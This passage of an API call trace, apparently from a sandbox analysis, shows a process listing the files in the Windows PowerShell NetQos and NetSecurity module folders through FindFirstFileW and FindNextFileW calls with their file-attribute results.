ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.444] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0177.444] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 0 [0177.445] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.445] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.445] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.446] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0177.446] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.446] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.446] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.447] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0177.447] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.447] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.447] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0177.448] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.448] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.448] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0177.448] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.449] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.449] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.449] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0177.449] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 0 [0177.450] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.451] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f [0177.451] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.453] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.454] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.454] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0177.455] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.455] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.455] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.455] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.456] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.456] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.456] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.456] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.457] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.457] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.457] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.458] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.458] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.458] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.458] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.459] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.459] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.459] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.460] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.460] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.460] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.461] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, 